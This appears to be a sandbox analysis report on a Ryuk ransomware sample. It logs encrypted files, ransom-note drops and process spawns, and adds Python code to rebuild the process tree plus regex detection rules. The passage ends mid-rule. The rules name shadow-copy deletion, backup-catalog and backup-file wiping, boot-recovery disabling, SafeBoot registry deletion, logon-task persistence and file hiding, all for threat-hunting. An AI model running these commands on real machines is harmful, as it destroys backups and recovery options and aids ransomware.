File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\TransparentAdvertisers.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_KMS_ClientC2R-ul.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-ae\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_MAK-ul-phn.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL011.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\selector.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Extreme Shadow.eftx.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluCCFilesEmpty_180x180.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations_retina.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\dt.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\OMICAUTINTL.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl C:\Windows\system32\wbadmin.exe N/A
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe N/A
(this row is repeated 61 times in the report; the 60 identical duplicates are omitted here)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1244 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1572 wrote to memory of 1272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1572 wrote to memory of 1272 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1244 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 4420 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4420 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1244 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 968 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 968 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1244 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 2236 wrote to memory of 4500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2236 wrote to memory of 4500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1244 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 4100 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4100 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1244 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 3928 wrote to memory of 4460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3928 wrote to memory of 4460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1244 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 320 wrote to memory of 220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 320 wrote to memory of 220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1244 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 4804 wrote to memory of 4688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4804 wrote to memory of 4688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 836 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2788 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2788 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4688 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4688 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1244 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 960 wrote to memory of 4844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 960 wrote to memory of 4844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1244 wrote to memory of 4552 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 4552 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 1244 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe C:\Windows\system32\cmd.exe
PID 424 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 424 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
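
The rows above are the sandbox's record of process creation (a parent writing into the address space of a child it has just spawned), which is why the signature fires on every spawn and each parent/child pair is logged twice. Rebuilt as a tree they show the shape that matters for hunting: every system tool (schtasks, attrib, reg, icacls, taskkill) is launched by cmd.exe /c from the sample (PID 1244), sometimes through a second cmd.exe. The following Python parser is an added example, not part of the sandbox report; it reconstructs that tree from a constructed subset of nine pairs taken from the table above and emitted in the report's own row format.

```python
"""Rebuild the process tree from 'Suspicious use of WriteProcessMemory' rows
(added example, not part of the sandbox output)."""
import ntpath
import re

SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe")
CMD = r"C:\Windows\system32\cmd.exe"
SYS32 = r"C:\Windows\system32"

# Constructed input: nine parent/child pairs copied from the table above and rendered
# in the report's row format; each pair is emitted twice because the sandbox logs
# two writes per spawn. A header line is included to show that it is skipped.
PAIRS = [
    (1244, 1572, SAMPLE, CMD), (1572, 1272, CMD, SYS32 + r"\schtasks.exe"),
    (1244, 968, SAMPLE, CMD),  (968, 3668, CMD, SYS32 + r"\attrib.exe"),
    (1244, 4804, SAMPLE, CMD), (4804, 4688, CMD, CMD), (4688, 3964, CMD, SYS32 + r"\icacls.exe"),
    (1244, 2788, SAMPLE, CMD), (2788, 3192, CMD, SYS32 + r"\reg.exe"),
]
ROWS = "Description Indicator Process Target\n" + "\n".join(
    f"PID {p} wrote to memory of {c} N/A {pi} {ci}" for p, c, pi, ci in PAIRS for _ in range(2))

# Paths in this report contain no spaces, so a whitespace split of the last two columns is safe.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")


def parse_rows(text):
    """Parse rows into unique (parent_pid, child_pid, parent_image, child_image)
    tuples in first-seen order; the duplicate second write of each spawn is dropped."""
    events, seen = [], set()
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:                       # header or blank line
            continue
        key = (int(m.group(1)), int(m.group(2)), m.group(3), m.group(4))
        if key not in seen:
            seen.add(key)
            events.append(key)
    return events


def build_tree(events):
    """Map pid -> image path and parent pid -> [child pids] in spawn order."""
    images, children = {}, {}
    for ppid, cpid, pimg, cimg in events:
        images.setdefault(ppid, pimg)
        images[cpid] = cimg
        children.setdefault(ppid, []).append(cpid)
    return images, children


def roots(events):
    """Pids that only ever appear as a parent: the process the detonation started."""
    return sorted({e[0] for e in events} - {e[1] for e in events})


def chains(events):
    """Every root-to-leaf path, as a list of image basenames."""
    images, children = build_tree(events)
    paths = []

    def walk(pid, path):
        path = path + [ntpath.basename(images[pid])]
        if pid not in children:
            paths.append(path)
        for kid in children.get(pid, []):
            walk(kid, path)

    for root in roots(events):
        walk(root, [])
    return paths


def leaf_tools(events):
    """Sorted basenames of the system binaries reached through cmd.exe hops from a root;
    parent=cmd.exe with an unsigned %TEMP% grandparent is what a hunt query keys on."""
    return sorted({c[-1] for c in chains(events) if c[-1].lower() != "cmd.exe"})


if __name__ == "__main__":
    for chain in chains(parse_rows(ROWS)):
        print(" -> ".join(chain))
```

Run against the full table the same code yields one chain per spawned tool; the depth-four chain (sample, cmd.exe, cmd.exe, icacls.exe) corresponds to the `cmd.exe /c start cmd.exe /c icacls ...` wrapper in the process list.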

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
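
The signatures in this section and the command lines recorded in the process list that follows are all ordinary Windows administration tools; what makes them a ransomware chain is the combination of recovery inhibition (vssadmin, wmic shadowcopy, bcdedit, wbadmin, del of backup files), persistence (schtasks ONLOGON, Startup-folder copies hidden with attrib), policy and SafeBoot tampering via reg, service and process termination, and the icacls grant to Everyone. The following Python rule set is an added example, not part of the sandbox report: it encodes that pattern with current ATT&CK technique IDs (the report's matrix is v6, which predates sub-techniques) and runs over constructed events built from the report's own command lines, plus one constructed `wevtutil cl` line (the report shows wevtutil.exe acquiring SeSecurityPrivilege and SeBackupPrivilege, the rights needed to clear a log, but the command line itself is not reproduced in this section) and three benign commands that must not fire. The rule names and the alert threshold are assumptions.

```python
"""Detection rules for the LOLBin command lines this report records, run over
constructed process-creation events (added example, not sandbox output)."""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str            # current ATT&CK technique id; the report's matrix is v6
    pattern: "re.Pattern[str]"


def _rule(name, technique, regex):
    return Rule(name, technique, re.compile(regex, re.IGNORECASE))


RULES = [
    _rule("shadow_copy_delete",    "T1490",     r"\b(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)\b"),
    _rule("shadow_storage_resize", "T1490",     r"\bvssadmin(\.exe)?\s+resize\s+shadowstorage\b"),
    # accepts the correct spelling and the sample's 'boostatuspolicy' typo (bcdedit rejects the latter,
    # so only 'recoveryenabled no' actually lands, but the attempt is still worth flagging)
    _rule("recovery_disabled",     "T1490",     r"\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|\w*statuspolicy\s+ignoreallfailures)\b"),
    _rule("backup_catalog_delete", "T1490",     r"\bwbadmin(\.exe)?\s+delete\s+catalog\b"),
    _rule("backup_file_wipe",      "T1490",     r"\bdel\s+/s\s+/f\s+/q\s.*\*\.(bak|bac|bkf|wbcat)\b"),
    _rule("logon_task",            "T1053.005", r"\bschtasks(\.exe)?\s+/create\b.*?/sc\s+onlogon\b"),
    _rule("startup_folder_drop",   "T1547.001", r"\bcopy\s.*\\start menu\\programs\\startup\\"),
    _rule("hide_file",             "T1564.001", r"\battrib(\.exe)?\s+\+h\s+\+s\b"),
    _rule("policy_tamper",         "T1112",     r"\breg(\.exe)?\s+add\s.*\\policies\\.*\s/v\s+(DisableTaskMgr|DisableAntiSpyware|EnableLinkedConnections|No\w+)\b"),
    _rule("safeboot_wipe",         "T1562.009", r"\breg(\.exe)?\s+delete\s.*\\safeboot\s+/va\b"),
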